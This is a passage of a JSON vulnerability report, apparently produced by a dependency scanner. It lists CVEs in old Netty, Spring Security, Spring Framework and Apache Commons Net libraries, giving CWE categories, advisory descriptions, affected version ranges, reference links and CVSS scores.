cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N","version":"3.1"},"products":["io.netty/netty-codec-http@vers:maven/>=4.0.0|<4.1.71.Final"]}],"title":"CVE-2021-43797/pkg:maven/io.netty/netty-codec-http@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37137"]}],"cve":"CVE-2021-37137","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2021-09-09T17:11:31","ids":[{"system_name":"CVE Record","text":"CVE-2021-37137"},{"system_name":"GitHub Advisory","text":"GHSA-9vjp-v76f-g363"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5316"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0012"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"\\tSnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way"},{"category":"details","details":"Vulnerability Details","text":"# SnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way ### Impact The Snappy frame decoder 
function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. ### Impact All users of SnappyFrameDecoder are affected and so the application may be in risk for a DoS attach due excessive memory usage. ### References https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185"}],"product_status":{"known_affected":["io.netty/netty-codec@vers:maven/>=4.0.0|<4.1.68.Final"],"known_not_affected":["io.netty/netty-codec@4.1.68.Final"]},"references":[{"summary":"GitHub Advisory GHSA-9vjp-v76f-g363","url":"https://github.com/netty/netty/security/advisories/GHSA-9vjp-v76f-g363"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37137"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37137"},{"summary":"NetApp Advisory ntap-20220210-0012","url":"https://security.netapp.com/advisory/ntap-20220210-0012"},{"summary":"Debian Advisory dsa-5316","url":"https://www.debian.org/security/2023/dsa-5316"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["io.netty/netty-codec@vers:maven/>=4.0.0|<4.1.68.Final"]}],"title":"CVE-2021-37137/pkg:maven/io.netty/netty-codec@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37136"]}],"cve":"CVE-2021-37136","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2021-09-09T17:11:21","ids":[{"system_name":"CVE Record","text":"CVE-2021-37136"},{"system_name":"GitHub Advisory","text":"GHSA-grg4-wf29-r9vv"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5316"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0012"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Bzip2Decoder doesn't allow setting size restrictions for decompressed data"},{"category":"details","details":"Vulnerability Details","text":"# Bzip2Decoder doesn't allow setting size restrictions for decompressed data ### Impact The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data 
(which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack ### Workarounds No workarounds other than not using the `Bzip2Decoder` ### References Relevant code areas: https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294 https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305"}],"product_status":{"known_affected":["io.netty/netty-codec@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]},"references":[{"summary":"GitHub Advisory GHSA-grg4-wf29-r9vv","url":"https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E"},{"summary":"Debian Mailing 
List","url":"https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37136"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37136"},{"summary":"NetApp Advisory ntap-20220210-0012","url":"https://security.netapp.com/advisory/ntap-20220210-0012"},{"summary":"Debian Advisory dsa-5316","url":"https://www.debian.org/security/2023/dsa-5316"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["io.netty/netty-codec@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]}],"title":"CVE-2021-37136/pkg:maven/io.netty/netty-codec@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-34462"]}],"cve":"CVE-2023-34462","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-06-20T16:33:22","ids":[{"system_name":"CVE Record","text":"CVE-2023-34462"},{"system_name":"GitHub 
Advisory","text":"GHSA-6mjq-h674-j845"},{"system_name":"Debian Advisory","text":"dsa-5558"},{"system_name":"NetApp Advisory","text":"ntap-20230803-0001"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0007"}],"notes":[{"audience":"developers","category":"other","text":"Allocation of Resources Without Limits or Throttling","title":"Additional CWE: 770"},{"category":"description","details":"Vulnerability Description","text":"netty-handler SniHandler 16MB allocation"},{"category":"details","details":"Vulnerability Details","text":"# netty-handler SniHandler 16MB allocation ### Summary The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. ### Details The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler` 1/ allocate a 16MB `ByteBuf` 2/ not fail `decode` method `in` buffer 3/ get out of the loop without an exception The combination of this without the use of a timeout makes easy to connect to a TCP server and allocate 16MB of heap memory per connection. ### Impact If the user has no idle timeout handler configured it might be possible for a remote peer to send a client hello packet which lead the server to buffer up to 16MB of data per connection. 
This could lead to a OutOfMemoryError and so result in a DDOS."}],"product_status":{"known_affected":["io.netty/netty-handler@vers:maven/>=4.0.0.Alpha1|<=4.1.93.Final"]},"references":[{"summary":"GitHub Advisory GHSA-6mjq-h674-j845","url":"https://github.com/netty/netty/security/advisories/GHSA-6mjq-h674-j845"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34462"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34462"},{"summary":"NetApp Advisory ntap-20230803-0001","url":"https://security.netapp.com/advisory/ntap-20230803-0001"},{"summary":"NetApp Advisory ntap-20240621-0007","url":"https://security.netapp.com/advisory/ntap-20240621-0007"},{"summary":"Debian Advisory dsa-5558","url":"https://www.debian.org/security/2023/dsa-5558"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["io.netty/netty-handler@vers:maven/>=4.0.0.Alpha1|<=4.1.93.Final"]}],"title":"CVE-2023-34462/pkg:maven/io.netty/netty-handler@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2021-22112"]}],"cve":"CVE-2021-22112","cwe":{"id":"269","name":"Improper Privilege Management"},"discovery_date":"2021-05-10T15:22:39","ids":[{"system_name":"CVE Record","text":"CVE-2021-22112"},{"system_name":"Oracle 
Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Vmware Advisory","text":"cve-2021-22112"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Privilege escalation in spring security"},{"category":"details","details":"Vulnerability Details","text":"# Privilege escalation in spring security Spring Security 5.4.x prior to 5.4.4, 5.3.x prior to 5.3.8.RELEASE, 5.2.x prior to 5.2.9.RELEASE, and older unsupported versions can fail to save the SecurityContext if it is changed more than once in a single request.A malicious user cannot cause the bug to happen (it must be programmed in). However, if the application's intent is to only allow the user to run with elevated privileges in a small portion of the application, the bug can be leveraged to extend those privileges to the rest of the application."}],"product_status":{"known_affected":["org.springframework.security/spring-security-web@vers:maven/>=3.0.0.RELEASE|<=5.2.8.RELEASE"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/02/19/7"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r163b3e4e39803882f5be05ee8606b2b9812920e196daa2a82997ce14@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2cb05e499807900ba23e539643eead9c5f0652fd271f223f89da1804@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r37423ec7eea340e92a409452c35b649dce02fdc467f0b3f52086c177@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3868207b967f926819fe3aa8d33f1666429be589bb4a62104a49f4e3@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r390783b3b1c59b978131ac08390bf77fbb3863270cbde59d5b0f5fde@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r413e380088c427f56102968df89ef2f336473e1b56b7d4b3a571a378@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r89aa1b48a827f5641310305214547f1d6b2101971a49b624737c497f@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra53677224fe4f04c2599abc88032076faa18dc84b329cdeba85d4cfc@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra6389b1b82108a3b6bbcd22979f7665fd437c2a3408c9509a15a9ca1@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/redbd004a503b3520ae5746c2ab5e93fd7da807a8c128e60d2002cd9b@%3Cissues.nifi.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22112"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22112"},{"summary":"Vmware Advisory cve-2021-22112","url":"https://tanzu.vmware.com/security/cve-2021-22112"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.security/spring-security-web@vers:maven/>=3.0.0.RELEASE|<=5.2.8.RELEASE"]}],"title":"CVE-2021-22112/pkg:maven/org.springframework.security/spring-security-web@4.2.12.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-5408"]}],"cve":"CVE-2020-5408","cwe":{"id":"329","name":"Generation of Predictable IV with CBC Mode"},"discovery_date":"2020-06-15T19:34:31","ids":[{"system_name":"CVE Record","text":"CVE-2020-5408"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Vmware Advisory","text":"cve-2020-5408"}],"notes":[{"audience":"developers","category":"other","text":"Use of Insufficiently Random Values","title":"Additional CWE: 330"},{"category":"description","details":"Vulnerability Description","text":"Insufficient Entropy in Spring Security"},{"category":"details","details":"Vulnerability Details","text":"# Insufficient Entropy in Spring Security Spring Security versions 5.3.x prior to 5.3.2, 5.2.x prior to 5.2.4, 5.1.x prior to 5.1.10, 5.0.x prior to 5.0.16 and 4.2.x 
prior to 4.2.16 use a fixed null initialization vector with CBC Mode in the implementation of the queryable text encryptor. A malicious user with access to the data that has been encrypted using such an encryptor may be able to derive the unencrypted values using a dictionary attack."}],"product_status":{"known_affected":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=4.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-5408"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-5408"},{"summary":"Vmware Advisory cve-2020-5408","url":"https://tanzu.vmware.com/security/cve-2020-5408"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=4.2.9.RELEASE"]}],"title":"CVE-2020-5408/pkg:maven/org.springframework.security/spring-security-core@4.2.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.
vmware.com/security/cve-2022-22978"]}],"cve":"CVE-2022-22978","cwe":{"id":"285","name":"Improper Authorization"},"discovery_date":"2022-05-20T00:00:39","ids":[{"system_name":"CVE Record","text":"CVE-2022-22978"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22978"},{"system_name":"NetApp Advisory","text":"ntap-20220707-0003"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Authorization","title":"Additional CWE: 863"},{"category":"description","details":"Vulnerability Description","text":"Authorization bypass in Spring Security"},{"category":"details","details":"Vulnerability Details","text":"# Authorization bypass in Spring Security In Spring Security versions 5.5.6 and 5.5.7 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass."}],"product_status":{"known_affected":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=5.4.9"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22978"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22978"},{"summary":"NetApp Advisory ntap-20220707-0003","url":"https://security.netapp.com/advisory/ntap-20220707-0003"},{"summary":"Cve 2022","url":"https://spring.io/security/cve-2022-22978"},{"summary":"Vmware Advisory cve-2022-22978","url":"https://tanzu.vmware.com/security/cve-2022-22978"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.security/spring-security-core@vers:maven/>=2.0.0|<=5.4.9"]}],"title":"CVE-2022-22978/pkg:maven/org.springframework.security/spring-security-core@4.2.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22970"]}],"cve":"CVE-2022-22970","cwe":{"id":"770","name":"Allocation of Resources Without Limits or Throttling"},"discovery_date":"2022-05-13T00:00:28","ids":[{"system_name":"CVE Record","text":"CVE-2022-22970"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22970"},{"system_name":"NetApp Advisory","text":"ntap-20220616-0006"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Denial of service in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Denial of service in Spring Framework In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, applications that handle file uploads are vulnerable to DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model 
object."}],"product_status":{"known_affected":["org.springframework/spring-beans@vers:maven/>=1.0|<=5.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22970"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22970"},{"summary":"NetApp Advisory ntap-20220616-0006","url":"https://security.netapp.com/advisory/ntap-20220616-0006"},{"summary":"Vmware Advisory cve-2022-22970","url":"https://tanzu.vmware.com/security/cve-2022-22970"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework/spring-beans@vers:maven/>=1.0|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22970/pkg:maven/org.springframework/spring-beans@4.3.6.RELEASE?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22968"]}],"cve":"CVE-2022-22968","cwe":{"id":"178","name":"Improper Handling of Case Sensitivity"},"discovery_date":"2022-04-15T00:00:32","ids":[{"system_name":"CVE Record","text":"CVE-2022-22968"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22968"},{"system_name":"NetApp 
Advisory","text":"ntap-20220602-0004"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper handling of case sensitivity in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Improper handling of case sensitivity in Spring Framework In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. Versions 5.3.19 and 5.2.21 contain a patch for this issue."}],"product_status":{"known_affected":["org.springframework/spring-context@vers:maven/>=1.0|<=5.2.9.RELEASE"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22968"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22968"},{"summary":"NetApp Advisory ntap-20220602-0004","url":"https://security.netapp.com/advisory/ntap-20220602-0004"},{"summary":"Vmware Advisory cve-2022-22968","url":"https://tanzu.vmware.com/security/cve-2022-22968"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.springframework/spring-context@vers:maven/>=1.0|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22968/pkg:maven/org.springframework/spring-context@4.3.6.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37533"]}],"cve":"CVE-2021-37533","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-12-03T15:30:26","ids":[{"system_name":"CVE Record","text":"CVE-2021-37533"},{"system_name":"Apache Advisory","text":"NET-711"},{"system_name":"Debian Advisory","text":"dsa-5307"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Commons Net vulnerable to information leakage via malicious server"},{"category":"details","details":"Vulnerability Details","text":"# Apache Commons Net vulnerable to information leakage via malicious server Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. 
